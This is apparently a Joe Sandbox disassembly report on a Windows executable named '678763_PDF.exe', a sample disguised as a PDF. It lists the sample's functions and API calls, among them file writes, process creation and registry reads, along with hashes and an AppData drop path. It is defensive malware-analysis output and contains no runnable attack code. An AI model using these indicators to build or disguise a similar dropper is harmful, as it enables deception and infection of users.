Associated: 00000000.00000002.1724701743.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1725588945.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_678763_PDF.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
Instruction ID: 8c4969e502f5bc4c8dfdefb7e9c2ba363b64d1215f12130c86bef4ebeef6f559
Opcode Fuzzy Hash: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
Instruction Fuzzy Hash: 19C08C30310902DACA802B209F087173960AB80340F158439A683E00B4CA30A065C92D

Function 004060CA Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004034E7,00000000,00000000,0040330B,000000FF,00000004,00000000,00000000,00000000), ref: 004060DE

Memory Dump Source

Source File: 00000000.00000002.1724662036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1724631304.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724676246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1725588945.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_678763_PDF.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
Instruction ID: a77d82ba430c16999eb1f2306cb11816df14181100402a9e04059793f1b3015d
Opcode Fuzzy Hash: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
Instruction Fuzzy Hash: 21E08632150219ABCF10DF948C00EEB3B9CFF04390F018436FD11E3040D630E92197A4

Function 004060F9 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,0040349D,00000000,0041EA20,000000FF,0041EA20,000000FF,000000FF,00000004,00000000), ref: 0040610D

Memory Dump Source

Source File: 00000000.00000002.1724662036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1724631304.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724676246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1725588945.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_678763_PDF.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
Instruction ID: 78408803ccc59d93ae5352641a5e7b8f709900c8df5e8e9e13d69f82a1dcf02f
Opcode Fuzzy Hash: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
Instruction Fuzzy Hash: 8FE08C3220021ABBCF109E908C00EEB3FACEB003A0F014432FA26E6050D670E83097A4

Function 004023F9 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 0040242A

Memory Dump Source

Source File: 00000000.00000002.1724662036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1724631304.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724676246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1725588945.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_678763_PDF.jbxd

Similarity

API ID: PrivateProfileString
String ID:
API String ID: 1096422788-0
Opcode ID: 979b3f2ec0bc23d324c76cc3db4c1f8da93b0e1d0eaca7bbe8bd823efade59bd
Instruction ID: 816608b18dc0c520cd9a71caba4f9b5dbdb35d60be0fcf423de44464aa3a4457
Opcode Fuzzy Hash: 979b3f2ec0bc23d324c76cc3db4c1f8da93b0e1d0eaca7bbe8bd823efade59bd
Instruction Fuzzy Hash: 95E04F31800229BEDB00EFA0CD09DAD3678AF40304F00093EF510BB0D1E7FC49519749

Function 004063C4 Relevance: 1.5, APIs: 1, Instructions: 19registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000000,?,?,00000000,?,00406452,?,?,?,?,: Completed,?,00000000), ref: 004063E8

Memory Dump Source

Source File: 00000000.00000002.1724662036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1724631304.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724676246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1725588945.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_678763_PDF.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 8ee5b0d2344bda13eae74e7442d869633e0228d129a7f9cdea9876c3f2a2c01f
Instruction ID: e31b8ecfa4924c4a0859a1c58e61cb12282203f41ec30ad4fda9f6d7c72ae418
Opcode Fuzzy Hash: 8ee5b0d2344bda13eae74e7442d869633e0228d129a7f9cdea9876c3f2a2c01f
Instruction Fuzzy Hash: 68D0123200020DBBDF115E91ED01FAB3B1DAB08310F014426FE16E5091D776D570A764

Function 004015A8 Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015B3

Memory Dump Source

Source File: 00000000.00000002.1724662036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1724631304.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724676246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1725588945.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_678763_PDF.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: bd9eef0ddba76f96e5ede74a4073dc30a0544dd5bf06428a66fa2d1577afb889
Instruction ID: b7b437a2ec26925c6232407c7e58ab903e49824199ec6a3f71ab3ccdd8f320e3
Opcode Fuzzy Hash: bd9eef0ddba76f96e5ede74a4073dc30a0544dd5bf06428a66fa2d1577afb889
Instruction Fuzzy Hash: 81D05B72B08104DBDB01DBE8EA48A9E73B4DB50338B21893BD111F11D0D7B8C545A71D

Function 00404522 Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404534

Memory Dump Source

Source File: 00000000.00000002.1724662036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1724631304.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724676246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1725588945.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_678763_PDF.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 8dc2ea4a8cffd810c80330d43262312fa0f844130cc7d84a637c392e617d0b66
Instruction ID: 7d988476d572be30e71f68111afb2513933db934ea5b2002f3fecefde51a3b0c
Opcode Fuzzy Hash: 8dc2ea4a8cffd810c80330d43262312fa0f844130cc7d84a637c392e617d0b66
Instruction Fuzzy Hash: ACC04C717402007BDA209F50AD49F07775467A0702F1494797341E51E0C674E550D61C

Function 0040450B Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000028,?,00000001,00404336), ref: 00404519

Memory Dump Source

Source File: 00000000.00000002.1724662036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1724631304.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724676246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1725588945.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_678763_PDF.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 5e23afa4ba150cac51e31494d2c9f0ee7f8efb4361c8cf2b7a73957f204a5961
Instruction ID: 777369a795cbaa9bd4fd16da76cbada5404ff361b75e364c58eeef3f96c31ac9
Opcode Fuzzy Hash: 5e23afa4ba150cac51e31494d2c9f0ee7f8efb4361c8cf2b7a73957f204a5961
Instruction Fuzzy Hash: 6BB09235181600AADA115B40DE09F867BA2E7A4701F029438B340640B0CBB210A0DB08

Function 004034EA Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403247,?), ref: 004034F8

Memory Dump Source

Source File: 00000000.00000002.1724662036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1724631304.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724676246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1725588945.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_678763_PDF.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
Instruction ID: 1f5c7ae16c2334422adcad36111bde95194575cbdac9b1f52e29a9f6e91cc98e
Opcode Fuzzy Hash: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
Instruction Fuzzy Hash: 34B01271240300BFDA214F00DF09F057B21ABA0700F10C034B388380F086711035EB0D

Function 004044F8 Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,004042CF), ref: 00404502

Memory Dump Source

Source File: 00000000.00000002.1724662036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1724631304.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724676246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1725588945.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_678763_PDF.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: faa9f1bbc6a73408ed15535010d366895e2d742fa65bef251b9024de670fa5bb
Instruction ID: 186c68f4495094c0cebc3eb7279f68ffc90812dad8dfd9e689695b78415bb769
Opcode Fuzzy Hash: faa9f1bbc6a73408ed15535010d366895e2d742fa65bef251b9024de670fa5bb
Instruction Fuzzy Hash: 43A00176544A04ABCE12EB50EF4990ABB62BBA4B01B618879A285514388B325921EB19

Function 00401FA9 Relevance: 1.3, APIs: 1, Instructions: 37COMMON

Download Yara Rule

APIs

Part of subcall function 004055DC: lstrlenW.KERNEL32(antholite,00000000,00424620,74DF23A0,?,?,?,?,?,?,?,?,?,0040341D,00000000,?), ref: 00405614
Part of subcall function 004055DC: lstrlenW.KERNEL32(0040341D,antholite,00000000,00424620,74DF23A0,?,?,?,?,?,?,?,?,?,0040341D,00000000), ref: 00405624
Part of subcall function 004055DC: lstrcatW.KERNEL32(antholite,0040341D,0040341D,antholite,00000000,00424620,74DF23A0), ref: 00405637
Part of subcall function 004055DC: SetWindowTextW.USER32(antholite,antholite), ref: 00405649
Part of subcall function 004055DC: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040566F
Part of subcall function 004055DC: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405689
Part of subcall function 004055DC: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405697

Part of subcall function 00405B3A: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042FA70,?,?,?, ohowno",?), ref: 00405B63
Part of subcall function 00405B3A: CloseHandle.KERNEL32(?,?,?, ohowno",?), ref: 00405B70

CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FF0

Part of subcall function 004069F6: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406A07
Part of subcall function 004069F6: GetExitCodeProcess.KERNEL32(?,?), ref: 00406A29

Part of subcall function 0040649E: wsprintfW.USER32 ref: 004064AB

Memory Dump Source

Source File: 00000000.00000002.1724662036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1724631304.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724676246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1725588945.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_678763_PDF.jbxd

Similarity

API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
String ID:
API String ID: 2972824698-0
Opcode ID: 23aa4ee629d2d375094aa14ebaeeae63623eaa73686822291d3629d93c53ad1e
Instruction ID: 72ab4701d282d41bfb99937ccb951c9b3d992b5a19319da95f503844dddfcbd3
Opcode Fuzzy Hash: 23aa4ee629d2d375094aa14ebaeeae63623eaa73686822291d3629d93c53ad1e
Instruction Fuzzy Hash: EEF0F032804015ABCB20BBA199849DE72B5CF00318B21413FE102B21D1C77C0E42AA6E

Non-executed Functions

Function 004049C7 Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 275stringCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003FB), ref: 00404A16
SetWindowTextW.USER32(00000000,?), ref: 00404A40
SHBrowseForFolderW.SHELL32(?), ref: 00404AF1
CoTaskMemFree.OLE32(00000000), ref: 00404AFC
lstrcmpiW.KERNEL32(: Completed,0042CA68,00000000,?,?), ref: 00404B2E
lstrcatW.KERNEL32(?,: Completed), ref: 00404B3A
SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404B4C

Part of subcall function 00405B9B: GetDlgItemTextW.USER32(?,?,00000400,00404B83), ref: 00405BAE

Part of subcall function 00406805: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\678763_PDF.exe",74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040350D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 00406868
Part of subcall function 00406805: CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00406877
Part of subcall function 00406805: CharNextW.USER32(?,"C:\Users\user\Desktop\678763_PDF.exe",74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040350D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 0040687C
Part of subcall function 00406805: CharPrevW.USER32(?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040350D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 0040688F

GetDiskFreeSpaceW.KERNEL32(0042AA38,?,?,0000040F,?,0042AA38,0042AA38,?,00000001,0042AA38,?,?,000003FB,?), ref: 00404C0F
MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404C2A

Part of subcall function 00404D83: lstrlenW.KERNEL32(0042CA68,0042CA68,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404E24
Part of subcall function 00404D83: wsprintfW.USER32 ref: 00404E2D
Part of subcall function 00404D83: SetDlgItemTextW.USER32(?,0042CA68), ref: 00404E40

Strings

A, xrefs: 00404AEA
C:\Users\user\AppData\Roaming\erstatningsgraden, xrefs: 00404B17
: Completed, xrefs: 00404B28, 00404B2D, 00404B38

Memory Dump Source

Source File: 00000000.00000002.1724662036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1724631304.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724676246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1725588945.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_678763_PDF.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: : Completed$A$C:\Users\user\AppData\Roaming\erstatningsgraden
API String ID: 2624150263-2049196090
Opcode ID: aab1ff152b07609d5ccd452d97b16b322b3ddb3b1e57e49f69f3ed37cd316d4d
Instruction ID: 8a45afd3ee22384d80319c7ed67abe130e578f1d2b392c1e8909742cb30e522b
Opcode Fuzzy Hash: aab1ff152b07609d5ccd452d97b16b322b3ddb3b1e57e49f69f3ed37cd316d4d
Instruction Fuzzy Hash: FCA192B1900208ABDB11EFA5DD45BAFB7B8EF84314F11803BF611B62D1D77C9A418B69

Function 004021AF Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(004085E8,?,00000001,004085D8,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040222E

Strings

C:\Users\user\AppData\Roaming\erstatningsgraden, xrefs: 0040226E

Memory Dump Source

Source File: 00000000.00000002.1724662036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1724631304.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724676246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1725588945.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_678763_PDF.jbxd

Similarity

API ID: CreateInstance
String ID: C:\Users\user\AppData\Roaming\erstatningsgraden
API String ID: 542301482-1967000036
Opcode ID: 54fcaebf65a6d80a769d2ffe25eeb1568fba929b3fba522b5b89cb6b807999ae
Instruction ID: f0c409d0c9855dc16f3492d495f607d4fcaf843261c47ee8c1995525671fe781
Opcode Fuzzy Hash: 54fcaebf65a6d80a769d2ffe25eeb1568fba929b3fba522b5b89cb6b807999ae
Instruction Fuzzy Hash: 76411471A00208AFCB40DFE4C989EAD7BB5FF48308B20457AF515EB2D1DB799982CB54

Function 00402910 Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040291F

Memory Dump Source

Source File: 00000000.00000002.1724662036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1724631304.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724676246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
